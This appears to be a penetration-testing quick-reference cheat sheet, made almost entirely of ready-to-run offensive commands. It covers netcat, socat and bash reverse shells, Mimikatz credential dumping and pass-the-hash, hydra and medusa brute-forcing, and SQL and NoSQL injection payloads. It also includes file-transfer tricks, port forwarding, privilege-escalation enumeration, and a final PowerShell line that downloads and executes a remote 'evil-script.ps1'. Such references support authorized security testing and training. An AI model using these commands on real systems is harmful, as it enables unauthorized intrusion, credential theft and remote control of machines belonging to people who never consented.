Quick reference for penetration testing. Search the page and find what you need.

  1. Service Discovery
  2. Service Enumeration
  3. Password Attacks
  4. Shells
  5. File Transfer
  6. SQL/NoSQL Injection
  7. Shell Injection
  8. Port Forwarding
  9. Linux Privilege Escalation
  10. Windows Privilege Escalation

Service Discovery

Nmap

# Ping scan
nmap -v -sn 10.1.1.0/24

# TCP scan:
nmap -v -sV -p- 10.1.1.1 --open

# UDP scan:
nmap -v -sV -sU --top-ports 50 10.1.1.1

# LAN scan
nmap -v -sV --top-ports 30 10.1.1.0/24 --open

Service Enumeration

Grab banner

nmap -sV -p 80 10.1.1.1
ncat -nv 10.1.1.1 80

Samba

# Find hosts
nbtscan -r 10.1.1.0/24

# List shares
smbclient -L 10.1.1.1

# Scripts
enum4linux 10.1.1.1

# Explore a share
smbclient -U administrator //10.1.1.1/C$

HTTP

# Scanners
nikto -h http://10.1.1.1/ -p 80

# Bruteforce
gobuster dir -u http://10.1.1.1/ -t 100 -w WORDLIST -x php,txt
gobuster dir -u http://10.1.1.1/ -t 100 -w WORDLIST -c "PHPSESSID=SESSID"
dirbuster

# Screenshots with cutycapt
while IFS= read -r u; do cutycapt --url="$u" --out="$u.png"; done < urls.txt

# Wordpress
wpscan --url example.com --enumerate ap,at,cb,dbe -o output.txt -f cli-no-color
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.php

DNS

# Zone transfer
host -l domain.com dns.domain.com
dnsrecon -d domain.com -t axfr

Password Attacks

Wordlists

# Create wordlist from website
cewl example.com -w words.txt -d 3
cewl example.com -w words.txt -H "Cookie:PHPSESSID=SESSID"

# Apply word mutations
john --wordlist=example_com_pwd.txt --rules --stdout > example_com_rules.txt

Bruteforce Tools

# HTTP Auth
medusa -h 10.1.1.1 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin-panel

# HTTP POST
hydra 10.1.1.1 http-form-post -l admin -P /usr/share/wordlists/rockyou.txt "/login.php:user=^USER^&password=^PASS^:Login failed" -f

# SSH
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.1.1.1 -f

Mimikatz

mimikatz # privilege::debug

# Retrieve SAM
mimikatz # token::elevate
mimikatz # lsadump::sam

# Retrieve logon passwords
mimikatz # sekurlsa::logonpasswords

# Retrieve tickets
mimikatz # sekurlsa::tickets

# Export kerberos tickets
kerberos::list /export

# Obtain kerberos ticket with NTLM hash
sekurlsa::pth /user:admin /domain:example.com /ntlm:NTLM_HASH /run:powershell.exe

Cracking Tools

# Bruteforce NTLM with john
john hashes.txt --format=NT

# Bruteforce Linux hashes with john
unshadow /etc/passwd /etc/shadow > combined.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

# Cracking kerberos tickets
python /usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

Shells

Netcat

# Bind shell
nc -nvlp 4567 -e /bin/bash

# Listener
nc -nvlp 444

# Reverse shell with -e option
nc -nv 10.1.1.1 444 -e /bin/bash

# Reverse shell without -e option
mkfifo /tmp/f; nc 10.1.1.1 444 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

Socat

# Listener
socat file:`tty`,raw,echo=0 tcp-listen:444
socat TCP4-LISTEN:4567 STDOUT

# Reverse shell
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.1.1.1:444
socat TCP4:10.1.1.1:4567 EXEC:/bin/bash

Bash

# Reverse
bash -i >& /dev/tcp/10.1.1.1/444 0>&1

Interactive Shells

# Python pty module
python -c "import pty; pty.spawn('/bin/bash')"

### Full tty upgrade from netcat
# On target
python -c "import pty; pty.spawn('/bin/bash')"
Ctrl-Z

# On Kali
stty raw -echo
fg

# On target
reset
export SHELL=bash
export TERM=xterm-256color	# Find on Kali with 'echo $TERM'
stty rows 24 columns 80		# Find on Kali with 'stty -a'

File Transfer

Netcat

# Receiver
nc -nlp 8080 > file.zip

# Sender
cat file.zip | nc 10.1.1.1 8080
nc 10.1.1.1 8080 < file.zip

Socat

# Sender
socat TCP4-LISTEN:8080,fork file:file.zip

# Receiver
socat TCP4:10.1.1.1:8080 file:file.zip,create

HTTP

# Start HTTP server (SimpleHTTPServer is Python 2; http.server is Python 3)
python -m SimpleHTTPServer 80
python3 -m http.server 80

# Download from Linux
wget http://10.1.1.1/file.exe
curl http://10.1.1.1/file.exe -o file.exe

# Download from Windows powershell
Invoke-WebRequest -Uri http://10.1.1.1/file.exe -OutFile file.exe
(New-Object System.Net.WebClient).DownloadFile('http://10.1.1.1/file.exe','C:\Windows\Temp\file.exe')

# Build wget.vbs in non-interactive Windows shells
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

wget.vbs http://10.1.1.1/file.exe file.exe

Encoders

# exe2hex
exe2hex -x file.exe -p file.cmd

# Base64
cat file.exe | base64 -w0
echo -n BASE64_STRING | base64 -d > file.exe

SQL Injection

Variables

@@hostname
@@version
@@tmpdir
@@version_compile_machine
CURRENT_USER()

Authentication Bypass

# MySQL
x' OR 1=1
x' OR 1=1 LIMIT 0,1

# NoSQL (Mongo)
username[$ne]=wrong&password[$ne]=wrong

Database Enumeration

# Select table names
SELECT table_name FROM information_schema.tables

# Select column names
SELECT column_name FROM information_schema.columns WHERE table_name='users'

# UNION SELECT
x' ORDER BY 5
x' UNION ALL SELECT 1,2,3,4,5

# NoSQL Retrieve username and password one character at a time
username[$regex]=a.*&password[$ne]=wrong
username[$regex]=ad.*&password[$ne]=wrong

Shell Injection

c1 ; c2       # sequence
c1 | c2       # pipe
c1 `c2`       # c2 output as argument for c1
c1 $(c2)      # c2 output as argument for c1
c1 && c2      # c2 if c1
c1 || c2      # c2 if not c1
c1 > f1       # c1 outputs on f1

Port Forwarding

Linux Machines

# Local port forwarding (0.0.0.0 listens on every interface; bind 127.0.0.1 to keep the listener local)
ssh -N -L 0.0.0.0:4455:10.1.1.1:445 admin@10.1.1.1

# Remote port forwarding
ssh -N -R 10.10.1.1:4455:127.0.0.1:445 attacker@10.10.1.1

# Socks5 with SSH
ssh -N -D 127.0.0.1:8888 admin@10.1.1.1

Windows Machines

# plink in an interactive shell
plink.exe -ssh -L 0.0.0.0:4444:10.1.1.1:445 admin@10.10.1.1
plink.exe -ssh -R 10.10.1.1:4444:127.0.0.1:445 attacker@10.10.1.1
plink.exe -ssh -D 127.0.0.1:8080 admin@10.10.1.1

# plink in a non-interactive shell
cmd.exe /c echo y | plink.exe -ssh -l admin -pw password -R 10.10.1.1:4444:127.0.0.1:445 attacker@10.10.1.1

# netsh local port forwarding
netsh interface portproxy add v4tov4 listenaddress=10.1.1.1 listenport=4444 connectaddress=10.1.1.1 connectport=3306
netsh advfirewall firewall add rule name="4444_to_3306" protocol=TCP dir=in localip=127.0.0.1 localport=3306 action=allow

Linux Privilege Escalation

System Enumeration

System

# OS version
uname -a
lsb_release -a
cat /etc/issue

# Environment
env

# Hostname
hostname

Users and groups

# Current user and groups
whoami
id

# All users and groups
cat /etc/passwd
cat /etc/group

Network

# IP
ifconfig
ip a

# Network connections
netstat -ant
ss -lnt

# Routing table
route -n

# Finding iptables-save files
grep -Hs iptables /etc/*

Processes and scheduled tasks

# List all processes
ps aux

# List scheduled tasks
ls -la /etc/cron*
cat /etc/crontab

Drives

cat /etc/fstab
mount -l
lsblk

Software

# Installed software
dpkg -l

Weak Permissions

# Find all writeable directories
find / -writable -type d 2>/dev/null

# Find all writeable files
find / -writable -type f 2>/dev/null

# Find all SUID files
find / -perm -u=s -type f 2>/dev/null

Windows Privilege Escalation

System Enumeration

System:

# OS version and arch
systeminfo

# Installed patches
wmic qfe
wmic qfe get Caption, Description, HotFixID, InstalledOn

# Environment
set

# Hostname
hostname

Users:

# Logged account
echo %username%
whoami

# Groups and permissions
whoami /groups
whoami /priv

# List users and get user detail
net users
net user john

# List groups and group memberships
net localgroup
net localgroup Administrators

Network:

# Network interfaces
ipconfig /all

# Routes
route print

# Arp cache
arp /a

# Firewall state and configuration
netsh firewall show state
netsh firewall show config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

# List current network connections
netstat /ano

Software

# Installed Software
wmic product get name, version, vendor

Drives

# List mounted and unmounted drives
mountvol

Processes and scheduled tasks

# Scheduled tasks
schtasks /query /fo LIST /v

# Which process is running which service
tasklist /SVC

Passwords Mining

# Look for these unattended files
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

Weak Permissions

# Find world-writeable files
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

# Check file ACL
icacls "C:\Program Files\Install\Path\file.exe"

Registry keys

# AlwaysInstallElevated
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Powershell

# Execute powershell script remotely
powershell.exe -exec bypass -C "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/evil-script.ps1')"